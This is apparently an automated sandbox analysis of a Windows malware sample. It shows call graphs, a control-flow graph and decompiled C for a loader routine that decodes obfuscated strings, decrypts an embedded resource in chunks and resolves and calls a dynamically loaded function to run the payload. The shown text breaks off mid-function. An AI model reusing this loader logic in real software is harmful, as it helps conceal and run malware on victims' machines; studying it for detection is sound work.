40bfc1 __flsbuf 63 API calls 14984->14986 14987 40e744 __msize 6 API calls 14985->14987 14988 417c87 14986->14988 14987->14978 14990 40e744 __msize 6 API calls 14988->14990 14989 4168fc 98 API calls __tolower_l 14989->14991 14990->14978 14991->14978 14991->14989 14993 414818 CompareStringW 14992->14993 14995 41482f strncnt 14992->14995 14994 41483b GetLastError 14993->14994 14993->14995 14994->14995 14997 414a95 14995->14997 15000 4148a4 14995->15000 15017 414881 14995->15017 14996 40ce09 __atodbl_l 5 API calls 14998 414b5a 14996->14998 14999 417a20 ___ansicp 87 API calls 14997->14999 14998->14950 15003 414abb 14999->15003 15001 414962 MultiByteToWideChar 15000->15001 15006 4148e6 GetCPInfo 15000->15006 15000->15017 15011 414982 15001->15011 15001->15017 15002 414b1c CompareStringA 15005 414b3a 15002->15005 15002->15017 15003->15002 15004 417a69 ___convertcp 70 API calls 15003->15004 15003->15017 15008 414ae0 15004->15008 15009 40b6b5 ___endstdio 63 API calls 15005->15009 15007 4148f7 15006->15007 15006->15017 15007->15001 15007->15017 15016 417a69 ___convertcp 70 API calls 15008->15016 15008->15017 15012 414b40 15009->15012 15010 4149d9 MultiByteToWideChar 15014 4149f2 MultiByteToWideChar 15010->15014 15015 414a83 15010->15015 15018 40b84d _malloc 63 API calls 15011->15018 15023 41499f __crtCompareStringA_stat 15011->15023 15013 40b6b5 ___endstdio 63 API calls 15012->15013 15013->15017 15014->15015 15026 414a09 15014->15026 15020 4147ae __freea 63 API calls 15015->15020 15019 414b01 15016->15019 15017->14996 15018->15023 15021 414b16 15019->15021 15022 414b0a 15019->15022 15020->15017 15021->15002 15024 40b6b5 ___endstdio 63 API calls 15022->15024 15023->15010 15023->15017 15024->15017 15025 414a53 MultiByteToWideChar 15027 414a66 CompareStringW 15025->15027 15028 414a7d 15025->15028 15029 414a1f __crtCompareStringA_stat 15026->15029 15030 40b84d _malloc 63 API calls 15026->15030 15027->15028 15031 4147ae __freea 63 API calls 15028->15031 15029->15015 15029->15025 15030->15029 15031->15015 15032->14827 15039 40d0f5 15033->15039 15036 40cd39 15037 40cd62 15036->15037 15038 40cd6e RaiseException 15036->15038 15037->15038 15038->14788 15040 40af59 15039->15040 15041 40d115 _strlen 15039->15041 15040->15036 15041->15040 15042 40b84d _malloc 63 API calls 15041->15042 15043 40d128 15042->15043 15043->15040 15044 40ef42 _strcpy_s 63 API calls 15043->15044 15044->15040 15046 4017e9 15045->15046 15048 40b783 __recalloc 73 API calls 15046->15048 15051 401844 15046->15051 15052 40182d 15046->15052 15048->15052 15049 40b6b5 ___endstdio 63 API calls 15049->15051 15050 40186d MultiByteToWideChar 15050->14794 15050->14795 15051->15050 15055 40b743 15051->15055 15052->15049 15052->15051 15054 401044 15053->15054 15056 40e231 __calloc_impl 63 API calls 15055->15056 15057 40b75d 15056->15057 15058 40bfc1 __flsbuf 63 API calls 15057->15058 15061 40b779 15057->15061 15059 40b770 15058->15059 15060 40bfc1 __flsbuf 63 API calls 15059->15060 15059->15061 15060->15061 15061->15051 15063 40b6b5 _doexit 15062->15063 15064 40b73d _doexit 15063->15064 15065 40b714 HeapFree 15063->15065 15064->14810 15065->15064 15066 40b727 15065->15066 15067 40bfc1 __flsbuf 63 API calls 15066->15067 15067->15064 15069 40aff8 15068->15069 15070 40b027 15069->15070 15071 40b01f __VEC_memcpy 15069->15071 15070->14818 15071->15070 15073 40e8ea _doexit 15072->15073 15074 40d6e0 __lock 63 API calls 15073->15074 15075 40e8f1 15074->15075 15076 40e9ba __initterm 15075->15076 15077 40e91d 15075->15077 15091 40e9f5 15076->15091 15079 4104e9 __decode_pointer 6 API calls 15077->15079 15081 40e928 15079->15081 15082 40e9aa __initterm 15081->15082 15085 4104e9 __decode_pointer 6 API calls 15081->15085 15082->15076 15084 40e9f2 _doexit 15084->13855 15090 40e93d 15085->15090 15086 40e9e9 15087 40e7ee _doexit 4 API calls 15086->15087 15087->15084 15088 4104e0 6 API calls _doexit 15088->15090 15089 4104e9 6 API calls __decode_pointer 15089->15090 15090->15082 15090->15088 15090->15089 15092 40e9d6 15091->15092 15093 40e9fb 15091->15093 15092->15084 15095 40d606 LeaveCriticalSection 15092->15095 15096 40d606 LeaveCriticalSection 15093->15096 15095->15086 15096->15092

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 63 401d50-401d52 60->63 64 401d36-401d38 60->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 84d01c 122->152 153 40234e call 84d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 84d01c 135->154 155 402390 call 84d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                        C-Code - Quality: 77%
                                                                        			E004019F0(void* __edx, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t337;
                                                                        				void* _t340;
                                                                        				int _t341;
                                                                        				CHAR* _t344;
                                                                        				intOrPtr* _t349;
                                                                        				int _t350;
                                                                        				long _t352;
                                                                        				signed int _t354;
                                                                        				intOrPtr _t358;
                                                                        				long _t359;
                                                                        				CHAR* _t364;
                                                                        				struct HINSTANCE__* _t365;
                                                                        				CHAR* _t366;
                                                                        				_Unknown_base(*)()* _t367;
                                                                        				int _t368;
                                                                        				int _t369;
                                                                        				int _t370;
                                                                        				intOrPtr* _t376;
                                                                        				int _t378;
                                                                        				intOrPtr _t379;
                                                                        				intOrPtr* _t381;
                                                                        				int _t383;
                                                                        				intOrPtr* _t384;
                                                                        				int _t385;
                                                                        				int _t396;
                                                                        				int _t399;
                                                                        				int _t402;
                                                                        				int _t405;
                                                                        				intOrPtr* _t407;
                                                                        				int _t413;
                                                                        				int _t415;
                                                                        				void* _t421;
                                                                        				int _t422;
                                                                        				int _t424;
                                                                        				intOrPtr* _t428;
                                                                        				intOrPtr _t429;
                                                                        				intOrPtr* _t431;
                                                                        				int _t432;
                                                                        				int _t435;
                                                                        				intOrPtr* _t437;
                                                                        				int _t438;
                                                                        				intOrPtr* _t439;
                                                                        				int _t440;
                                                                        				int _t442;
                                                                        				signed int _t448;
                                                                        				signed int _t451;
                                                                        				signed int _t452;
                                                                        				int _t469;
                                                                        				int _t471;
                                                                        				int _t482;
                                                                        				signed int _t486;
                                                                        				intOrPtr* _t488;
                                                                        				intOrPtr* _t490;
                                                                        				intOrPtr* _t492;
                                                                        				intOrPtr _t493;
                                                                        				void* _t494;
                                                                        				struct HRSRC__* _t497;
                                                                        				void* _t514;
                                                                        				int _t519;
                                                                        				intOrPtr* _t520;
                                                                        				void* _t524;
                                                                        				void* _t525;
                                                                        				struct HINSTANCE__* _t526;
                                                                        				intOrPtr _t527;
                                                                        				void* _t531;
                                                                        				void* _t535;
                                                                        				struct HRSRC__* _t536;
                                                                        				intOrPtr* _t537;
                                                                        				intOrPtr* _t539;
                                                                        				int _t542;
                                                                        				int _t543;
                                                                        				intOrPtr* _t547;
                                                                        				intOrPtr* _t548;
                                                                        				intOrPtr* _t549;
                                                                        				intOrPtr* _t550;
                                                                        				void* _t551;
                                                                        				intOrPtr _t552;
                                                                        				int _t555;
                                                                        				void* _t556;
                                                                        				void* _t557;
                                                                        				void* _t558;
                                                                        				void* _t559;
                                                                        				void* _t560;
                                                                        				void* _t561;
                                                                        				void* _t562;
                                                                        				intOrPtr* _t563;
                                                                        				void* _t564;
                                                                        				void* _t565;
                                                                        				void* _t566;
                                                                        				void* _t567;
                                                                        
                                                                        				_t567 = __eflags;
                                                                        				_t494 = __edx;
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                        				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                        				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                        				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                        				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                        				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                        				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                        				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                        				 *((char*)(_t556 + 0x23)) = 6;
                                                                        				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                        				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                        				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                        				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                        				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                        				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                        				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                        				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                        				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                        				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                        				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                        				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                        				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                        				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                        				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                        				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                        				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                        				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                        				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                        				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                        				 *((char*)(_t556 + 0x38)) = 0;
                                                                        				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                        				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                        				_t557 = _t556 + 0xc;
                                                                        				if(_t337 == 0x41b2a0) {
                                                                        					L80:
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                        					_t525 = _t340;
                                                                        					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                        					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                        					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                        					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                        					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                        					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                        					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                        					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                        					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                        					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                        					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                        					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x84)) = 0;
                                                                        					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                        					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                        					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                        					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                        					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                        					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                        					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                        					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                        					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                        					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                        					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                        					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                        					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x38)) = 0;
                                                                        					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                        					if(_t341 == 0) {
                                                                        						L38:
                                                                        						FindCloseChangeNotification(_t525); // executed
                                                                        						_t526 = GetModuleHandleA(0);
                                                                        						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                        						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                        						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                        						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                        						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                        						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                        						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                        						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                        						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                        						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                        						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                        						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                        						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                        						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                        						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                        						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                        						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                        						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                        						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                        						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                        						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                        						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                        						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                        						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                        						 *((char*)(_t557 + 0x3c)) = 0;
                                                                        						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                        						_t558 = _t557 + 8;
                                                                        						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                        						 *(_t558 + 0x50) = _t536;
                                                                        						_t551 = LoadResource(_t526, _t536);
                                                                        						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                        						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                        						_push(0x40022);
                                                                        						_t537 = _t349; // executed
                                                                        						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                        						_t559 = _t558 + 8;
                                                                        						 *(_t559 + 0x34) = _t350;
                                                                        						__eflags = _t350;
                                                                        						if(_t350 == 0) {
                                                                        							 *(_t559 + 0x50) = 0;
                                                                        						} else {
                                                                        							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                        							_t486 =  *(_t559 + 0x40);
                                                                        							_t559 = _t559 + 0xc;
                                                                        							 *(_t559 + 0x50) = _t486;
                                                                        						}
                                                                        						E00401300( *(_t559 + 0x50));
                                                                        						_t497 =  *(_t559 + 0x48);
                                                                        						_t352 = SizeofResource(_t526, _t497);
                                                                        						 *(_t559 + 0x40) = _t352;
                                                                        						asm("cdq");
                                                                        						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                        						__eflags = _t354;
                                                                        						if(_t354 > 0) {
                                                                        							_t519 =  *(_t559 + 0x3c);
                                                                        							_t482 = _t537 - _t519;
                                                                        							__eflags = _t482;
                                                                        							 *(_t559 + 0x34) = _t519;
                                                                        							 *(_t559 + 0x88) = _t482;
                                                                        							 *(_t559 + 0x38) = _t354;
                                                                        							do {
                                                                        								_t424 =  *(_t559 + 0x34);
                                                                        								_push( *(_t559 + 0x88) + _t424);
                                                                        								_push(0x400);
                                                                        								_push(_t424);
                                                                        								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                        								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                        								_t179 = _t559 + 0x38;
                                                                        								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                        								__eflags =  *_t179;
                                                                        							} while ( *_t179 != 0);
                                                                        						}
                                                                        						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                        						__eflags = _t448;
                                                                        						if(_t448 < 0) {
                                                                        							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                        							__eflags = _t448;
                                                                        						}
                                                                        						__eflags = _t448;
                                                                        						if(_t448 > 0) {
                                                                        							_t421 =  *(_t559 + 0x40) - _t448;
                                                                        							_push(_t421 + _t537);
                                                                        							_push(_t448);
                                                                        							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                        							__eflags = _t422;
                                                                        							_push(_t422);
                                                                        							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                        						}
                                                                        						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                        						_t560 = _t559 + 0xc;
                                                                        						FreeResource(_t551);
                                                                        						_t552 =  *_t537;
                                                                        						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                        						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                        						_t561 = _t560 + 4;
                                                                        						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                        						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                        						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                        						_t192 = _t537 + 4; // 0x4
                                                                        						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                        						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                        						_t528 = _t527 + 0xe;
                                                                        						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                        						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                        						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                        						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                        						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                        						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                        						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                        						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                        						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                        						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                        						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                        						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                        						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                        						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                        						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                        						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                        						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                        						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                        						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                        						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                        						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                        						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                        						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                        						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                        						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                        						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                        						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                        						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                        						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                        						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                        						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                        						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                        						 *((char*)(_t561 + 0x54)) = 0;
                                                                        						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                        						_t562 = _t561 + 0x24;
                                                                        						_t365 = LoadLibraryA(_t364); // executed
                                                                        						_t538 = _t365;
                                                                        						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                        						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                        						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                        						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                        						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                        						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                        						_t451 = _t562 + 0x134;
                                                                        						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                        						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                        						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                        						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                        						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                        						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                        						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                        						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                        						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                        						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                        						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                        						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                        						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                        						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                        						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                        						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                        						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                        						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                        						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                        						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                        						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                        						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                        						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                        						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                        						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                        						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                        						 *((char*)(_t562 + 0x38)) = 0;
                                                                        						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                        						_t563 = _t562 + 8;
                                                                        						_t367 = GetProcAddress(_t365, _t366);
                                                                        						__eflags = _t367;
                                                                        						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                        						__eflags = _t452;
                                                                        						 *(_t563 + 0x47) = _t452 == 0;
                                                                        						 *0x423480 = _t367;
                                                                        						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                        						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                        						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                        						 *(_t563 + 0x58) = 0;
                                                                        						 *(_t563 + 0x54) = 0;
                                                                        						__eflags = _t452;
                                                                        						if(_t452 != 0) {
                                                                        							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                        							__eflags = _t368;
                                                                        							if(_t368 >= 0) {
                                                                        								__eflags =  *(_t563 + 0x47);
                                                                        								if( *(_t563 + 0x47) == 0) {
                                                                        									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                        									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                        									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                        									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
